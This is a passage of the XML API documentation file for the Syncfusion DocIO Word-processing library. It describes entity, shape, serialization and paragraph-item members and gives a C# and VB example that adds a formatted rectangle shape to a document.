        <member name="P:Syncfusion.DocIO.DLS.Reflection.RotateWithShape">
            <summary>
            Specifies the if reflection rotates with shape
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Reflection.Alignment">
            <summary>
            Reflected shadow alignment
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Shape">
            <summary>
            Represents the shapes and it manipulations in the Word document.
            </summary>
            <example>
            <para>The following code example demonstrates how to add new shape to document.</para>
            <code lang="C#">
            private void Button1_Click(System.Object sender, System.EventArgs e)
            {
                //Create a new Word document
                WordDocument document = new WordDocument("Template.docx");
                //Add the section into Word document
                WSection section = document.AddSection() as WSection;
                //Add a paragraph to created section
                WParagraph paragraph = document.Sections[0].Paragraphs[0];
                //Create a new shape
                Syncfusion.DocIO.DLS.Shape shape = new Syncfusion.DocIO.DLS.Shape(document, AutoShapeType.Rectangle);
                //Specify the shape formatting options
                shape.AlternativeText = "demo shape";
                shape.FillFormat.Color = Color.LightBlue;
                shape.Height = 75;
                shape.Width = 100;
                shape.HorizontalAlignment = ShapeHorizontalAlignment.Left;
                shape.HorizontalOrigin = HorizontalOrigin.Margin;
                shape.LineFormat.Line = true;
                shape.LineFormat.Style = Syncfusion.DocIO.DLS.LineStyle.Single;
                shape.Name = "Rectangle";
                shape.Title = "Rectangle shape demo";
                shape.VerticalAlignment = ShapeVerticalAlignment.Center;
                shape.VerticalOrigin = VerticalOrigin.Page;
                shape.WrapFormat.TextWrappingStyle = TextWrappingStyle.Square;
                string paraText = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula";
                //Add the new paragraph to shape with some text
                shape.TextBody.AddParagraph().AppendText(paraText);
                //Add the shape to paragraph
                paragraph.ChildEntities.Add(shape);
                //Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx);
                document.Close();
            }
            </code>
            <code lang="VB">
            Private Sub button_Click(sender As Object, e As EventArgs)
                'Create a new Word document
                Dim document As New WordDocument("Template.docx")
                'Add the section into Word document
                Dim section As WSection = TryCast(document.AddSection(), WSection)
                'Add a paragraph to created section
                Dim paragraph As WParagraph = document.Sections(0).Paragraphs(0)
                'Create a new shape
                Dim shape As New Syncfusion.DocIO.DLS.Shape(document, AutoShapeType.Rectangle)
                'Specify the shape formatting options
                shape.AlternativeText = "demo shape"
                shape.FillFormat.Color = Color.LightBlue
                shape.Height = 75
                shape.Width = 100
                shape.HorizontalAlignment = ShapeHorizontalAlignment.Left
                shape.HorizontalOrigin = HorizontalOrigin.Margin
                shape.LineFormat.Line = True
                shape.LineFormat.Style = Syncfusion.DocIO.DLS.LineStyle.[Single]
                shape.Name = "Rectangle"
                shape.Title = "Rectangle shape demo"
                shape.VerticalAlignment = ShapeVerticalAlignment.Center
                shape.VerticalOrigin = VerticalOrigin.Page
                shape.WrapFormat.TextWrappingStyle = TextWrappingStyle.Square
                Dim paraText As String = "Lorem ipsum dolor sit amet, lacus amet amet ultricies. Quisque mi venenatis morbi libero, orci dis, mi ut et class porta, massa ligula magna enim, aliquam orci vestibulum Turpis facilisis vitae consequat, cum a a,turpis dui consequat massa in dolor per, felis non amet.Auctor eleifend in omnis elit vestibulum, donec non elementum tellus est mauris, id aliquam, at lacus, arcu pretium proin lacus dolor et. Eu tortor, vel ultrices amet dignissim mauris vehicula"
                'Add the new paragraph to shape with some text
                shape.TextBody.AddParagraph().AppendText(paraText)
                'Add the shape to paragraph
                paragraph.ChildEntities.Add(shape)
                'Save and close the Word document instance
                document.Save("Sample.docx", FormatType.Docx)
                document.Close()
            End Sub
            </code>
            </example>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ShapeBase">
            <summary>
            Provides the base implementation for chart and shape classes.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.ParagraphItem">
            <summary>
            Provides the base implementation for all paragraph items.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.WidgetBase">
            <summary>
            The base implementation of IWidget interface
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.Entity">
            <summary>
            Provides the base implementation for DLS entities.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase">
            <summary>
            
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.OwnerHolder">
            <summary>
            Provides the base implementation for all the classes with holder behavior.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.OwnerHolder.m_doc">
            <summary>
            Specifies the Word document instance.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.#ctor">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> class.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> class with the specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> class
            with the specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance and 
            <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> instance.
            </summary>
            <param name="doc">The doc.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.SetOwner(Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Sets the owner.
            </summary>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.SetOwner(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Sets the owner.
            </summary>
            <param name="doc">The doc.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.OnStateChange(System.Object)">
            <summary>
            "Listener" for state change.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.OwnerHolder.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.OwnerHolder.Document">
            <summary>
            Gets the owner document. Read-only.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.OwnerHolder.OwnerBase">
            <summary>
            Gets the owner.
            </summary>
            <value>The owner.</value>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.XML.IXDLSSerializable">
            <summary>
            Represents required functionality for serialization by XDLSReader/Writer.
            <remarks>Used for objects/items implementation</remarks>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSSerializable.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Object can writes by this method own "value" properties
            </summary>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSSerializable.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Object can writes by this method own complex/binary data.
            </summary>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSSerializable.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Object can reads by this method own "value" properties
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSSerializable.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Object can reads by this method own complex/binary data.
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.IXDLSSerializable.RestoreReference(System.String,System.Int32)">
            <summary>
            Object can use this method for restore references.
            </summary>
            <param name="name"></param>
            <param name="value"></param>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.IXDLSSerializable.XDLSHolder">
            <summary>
            Gets special holder with child objects.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.m_XDLSHolder">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="entity">The entity.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Syncfusion#DocIO#DLS#XML#IXDLSSerializable#WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            
            </summary>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Syncfusion#DocIO#DLS#XML#IXDLSSerializable#WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            
            </summary>
            <param name="writer"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Syncfusion#DocIO#DLS#XML#IXDLSSerializable#ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Syncfusion#DocIO#DLS#XML#IXDLSSerializable#ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            
            </summary>
            <param name="reader"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Syncfusion#DocIO#DLS#XML#IXDLSSerializable#RestoreReference(System.String,System.Int32)">
            <summary>
            
            </summary>
            <param name="name"></param>
            <param name="value"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.CloneInt">
            <summary>
            Clones itself.
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.CloneImpl">
            <summary>
            Clones itself.
            <exclude/>
            </summary>
            <returns>Returns cloned object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.WriteXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter)">
            <summary>
            Writes object data as xml attributes.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.WriteXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentWriter)">
            <summary>
            Writes object data as inside xml element.
            <exclude/>
            </summary>
            <param name="writer">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentWriter"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.ReadXmlAttributes(Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSAttributeReader"/> object.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.ReadXmlContent(Syncfusion.DocIO.DLS.XML.IXDLSContentReader)">
            <summary>
            Reads object data from xml attributes.
            <exclude/>
            </summary>
            <param name="reader">The <see cref="T:Syncfusion.DocIO.DLS.XML.IXDLSContentReader"/> object.</param>
            <returns>The value indicating the presence of xml content.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.InitXDLSHolder">
            <summary>
            Registers child objects in XDSL holder.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.RestoreReference(System.String,System.Int32)">
            <summary>
            <exclude/>
            </summary>
            <param name="name"></param>
            <param name="index"></param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.Syncfusion#DocIO#DLS#XML#IXDLSSerializable#XDLSHolder">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.XML.XDLSSerializableBase.XDLSHolder">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IEntity">
            <summary>
            Represents an entity
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.IEntity.Clone">
            <summary>
            Creates a duplicate of the entity.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> object which is a copy of the current entity</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntity.Document">
            <summary>
            Gets the <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> of this entity.
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntity.Owner">
            <summary>
            Gets the owner of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> that specifies the owner.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntity.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntity.NextSibling">
            <summary>
            Gets the next sibling of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IEntity"/> that represents the next sibling.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntity.PreviousSibling">
            <summary>
            Gets the previous sibling of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IEntity"/> that represents the previous sibling.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IEntity.IsComposite">
            <summary>
            Gets a value indicating whether this instance is composite.
            </summary>
            <value><b>True</b> if this instance is composite, otherwise <c>false</c>.</value>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsFloatingItem(System.Boolean)">
            <summary>
            Determine whether the paraItem is in floating item or not.
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsBuiltInCharacterStyle(Syncfusion.DocIO.DLS.BuiltinStyle)">
            <summary>
            Determines whether the specified built in style type is character style or not.
            </summary>
            <param name="buildInStyle">built in style.</param>
            <returns><c>true</c>if the built in style type is character style, otherwise<c>false</c></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.Entity"/> class.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> object.</param>
            <param name="owner">The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> that is the owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.Clone">
            <summary>
            Creates a duplicate copy of the entity.
            </summary>
            <returns>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> object which is a copy of the current entity.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsVerticalTextDirection(Syncfusion.DocIO.DLS.TextDirection)">
            <summary>
            Returns bool indiacting whether the text is in vertical direction 
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.AddSelf">
            <summary>
            Adds the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.AttachToDocument">
            <summary>
            Attaches to document
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.RemoveSelf">
            <summary>
            Removes the self.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.GetIndexInOwnerCollection">
            <summary>
            Gets the index in parent collection.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsParentOf(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Determines whether is parent of the specified entity.
            </summary>
            <param name="entity">The entity.</param>
            <returns>
            	If it is parent of the specified entity, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.InitLayoutInfo(Syncfusion.DocIO.DLS.Entity,System.Boolean@)">
            <summary>
            To initialize the layoutinfo as null 
            </summary>
            <param name="entity">Last TOC Entry entity</param>
            <param name="isLastTOCEntry">Set to <c>True</c> if last TOC entry is reached</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.GetBaseEntity(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Get the base entity
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.GetZOrder">
            <summary>
            Get ZOrderIndex value for the entity
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsNeedToSortByItsPosition(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Sort the floating item based on its DOM Position
            </summary>
            <param name="secondfloatingItem">Second floating item</param>
            <returns><c>True</c>when we need to sort the floating item collection based on its position</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsNeedToSortByItsPosition(Syncfusion.DocIO.DLS.WParagraph,Syncfusion.DocIO.DLS.WParagraph)">
            <summary>
            sort the floating items based on its owner table and paragraph
            </summary>
            <param name="firstFloatingItem">first floating item owner paragrpah</param>
            <param name="secondfloatingItem">second floating item owner paragrpah</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.IsNeedToSortByItsPosition(Syncfusion.DocIO.DLS.WTableCell,Syncfusion.DocIO.DLS.WTableCell)">
            <summary>
            sort the floating items based on its owner  table
            </summary>
            <param name="firstItemOwnerCell">first floating item owner table cell</param>
            <param name="secondItemOwnerCell">second floating item owner cell</param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.GetOwnerSection(Syncfusion.DocIO.DLS.Entity)">
             <summary>
            Gets the owner section of given entity
             </summary>
             <param name="entity">Entity</param>
             <returns>Owner section of current entity</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.Entity.GetOwnerTable(Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Gets the owner table of given entity
            </summary>
            <param name="entity">Entity</param>
            <returns>Owner table of current entity</returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entity.Owner">
            <summary>
            Gets the owner of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.Entity"/> that specifies the owner.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entity.EntityType">
            <summary>
            Gets the type of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.EntityType"/> of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entity.NextSibling">
            <summary>
            Gets the next sibling of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IEntity"/> that represents the next sibling.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entity.PreviousSibling">
            <summary>
            Gets the previous sibling of the entity.
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.IEntity"/> that represents the previous sibling.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entity.IsComposite">
            <summary>
            Gets a value indicating whether this instance is composite.
            </summary>
            <value><b>True</b> if this instance is composite, otherwise <c>false</c>.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.Entity.DeepDetached">
            <summary>
            Gets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.OwnerHolder"/> is detached.
            </summary>
            <value>if detached, set to <c>true</c>.</value>
        </member>
        <member name="T:Syncfusion.Layouting.IWidget">
            <summary>
            Represents a base Widget interface
            </summary>
        </member>
        <member name="M:Syncfusion.Layouting.IWidget.InitLayoutInfo">
            <summary>
            Initializing LayoutInfo value to null
            </summary>
        </member>
        <member name="P:Syncfusion.Layouting.IWidget.LayoutInfo">
            <summary>
            Gets layout info.
            </summary>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.WidgetBase.m_layoutInfo">
            <summary>
            
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WidgetBase.#ctor(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.Entity)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.WidgetBase"/> class.
            </summary>
            <param name="doc">The doc.</param>
            <param name="owner">The owner.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WidgetBase.Syncfusion#Layouting#IWidget#InitLayoutInfo">
            <summary>
            Initializing layout info to null
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.WidgetBase.CreateLayoutInfo">
            <summary>
            <exclude/>
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.WidgetBase.Syncfusion#Layouting#IWidget#LayoutInfo">
            <summary>
            Gets layout info.
            </summary>
        </member>
        <member name="T:Syncfusion.DocIO.DLS.IParagraphItem">
            <summary>
            Represents the paragraph item
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IParagraphItem.OwnerParagraph">
            <summary>
            Gets the owner paragraph of the current paragraph item. Read-only
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> instance which is the owner of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IParagraphItem.IsInsertRevision">
            <summary>
            Gets a value indicating whether this item was inserted to the document,
            when <see cref="P:Syncfusion.DocIO.DLS.WordDocument.TrackChanges"/> is or was set to <b>true</b>. Read-only.
            </summary>
            <value><b>True</b> if this instance was inserted; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.IParagraphItem.IsDeleteRevision">
            <summary>
            Gets a value indicating whether this item was deleted from the document,
            when <see cref="P:Syncfusion.DocIO.DLS.WordDocument.TrackChanges"/> is or was set to <b>true</b>. Read-only.
            </summary>
            <value><b>True</b> if this instance is delete revision; otherwise, <b>false</b>.
            </value>
        </member>
        <member name="F:Syncfusion.DocIO.DLS.ParagraphItem.m_charFormat">
            <summary>
            Specifies the character format.
            <exclude/>
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.ApplyStyle(System.String)">
            <summary>
            Applies the style with the specified name to all paragraph items.
            </summary>
            <param name="styleName">The <b>string</b> that represents the style name.</param>
            <remarks>The specified style must exists in <see cref="P:Syncfusion.DocIO.DLS.WordDocument.Styles"/> collection.</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.ApplyCharacterStyle(Syncfusion.DocIO.DLS.IWCharacterStyle)">
            <summary>
            Applies the specified style.
            </summary>
            <param name="style">Style name</param>
            <remarks>Specified style must exist in Document.Styles collection</remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetOwnerParagraph">
            <summary>
            Get Owner Paragraph of the Item is in SDTInlineContent
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.SetInsertRev(System.Boolean)">
            <summary>
            Sets the insert revision.
            </summary>
            <param name="value">if it specifies insert revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.SetDeleteRev(System.Boolean)">
            <summary>
            Sets the delete revision.
            </summary>
            <param name="value">if it specifies delete revision, set to <c>true</c>.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.#ctor(Syncfusion.DocIO.DLS.WordDocument)">
            <summary>
            Initializes a new instance of the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> class with the specified <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.
            </summary>
            <param name="doc">The <see cref="T:Syncfusion.DocIO.DLS.WordDocument"/> instance.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.AttachToParagraph(Syncfusion.DocIO.DLS.WParagraph,System.Int32)">
            <summary>
            Attaches to paragraph.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.Detach">
            <summary>
            Detaches from owner.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.AcceptChanges">
            <summary>
            Accepts the changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.RemoveChanges">
            <summary>
            Removes the format changes.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.HasTrackedChanges">
            <summary>
            Determines whether has tracked changes.
            </summary>
            <returns>
            	if has tracked changes, set to <c>true</c>.
            </returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetCharFormat">
            <summary>
            Gets the char format.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.SetCharacterFormat(Syncfusion.DocIO.DLS.WCharacterFormat)">
            <summary>
            Sets the character format.
            </summary>
            <param name="charFormat"></param>
            <remarks></remarks>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.Close">
            <summary>
            Closes this instance.
            </summary>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.CloneImpl">
            <summary>
            Creates a duplicate copy of the <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/>.
            <exclude/>
            </summary>
            <returns>The reference of the newly created object.</returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.CloneRelationsTo(Syncfusion.DocIO.DLS.WordDocument,Syncfusion.DocIO.DLS.OwnerHolder)">
            <summary>
            Clones the relations.
            </summary>
            <param name="doc">The doc.</param>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetTextWrappingStyle">
            <summary>
            Get text wrapping style
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.IsWrappingBoundsAdded">
            <summary>
            Determines whether is wrapping bounds added or not.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetLayOutInCell">
            <summary>
            Gets the lay out in cell.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetVerticalOrigin">
            <summary>
            Get vertical origin
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetShapeVerticalAlignment">
            <summary>
            Get shape vertical alignment
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetShapeHorizontalAlignment">
            <summary>
            Get shape horizontal alignment
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetHorizontalOrigin">
            <summary>
            Get horizontal origin
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetHorizontalPosition">
            <summary>
            Get horizontal position
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetVerticalPosition">
            <summary>
            Get vertical position
            </summary>
            <param name="entity"></param>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetAllowOverlap">
            <summary>
            Gets the allow overlap.
            </summary>
            <returns></returns>
        </member>
        <member name="M:Syncfusion.DocIO.DLS.ParagraphItem.GetWrapCollectionIndex">
            <summary>
            Gets the index of the wrap collection.
            </summary>
            <returns></returns>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.SkipDocxItem">
            <summary>
            
            </summary>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.IsCloned">
            <summary>
            Gets or sets a value indicating whether this <see cref="T:Syncfusion.DocIO.DLS.ParagraphItem"/> is cloned.
            </summary>
            <value>
              <c>true</c> if cloned; otherwise, <c>false</c>.
            </value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.OwnerParagraph">
            <summary>
            Gets the owner paragraph of the current paragraph item. Read-only
            </summary>
            <value>The <see cref="T:Syncfusion.DocIO.DLS.WParagraph"/> instance which is the owner of the current item.</value>
        </member>
        <member name="P:Syncfusion.DocIO.DLS.ParagraphItem.IsInsertRevision">
            <summary>
            Gets a value indicating whether this item was inserted to the document,
            when <see cref="P:Syncfusion.DocIO.DLS.WordDocument.TrackChanges"/> is or was set to <b>true</b>. Read-only.
            </summary>
            <value><b>True</b> if this instance was inserted; otherwise, <b>false</b>.
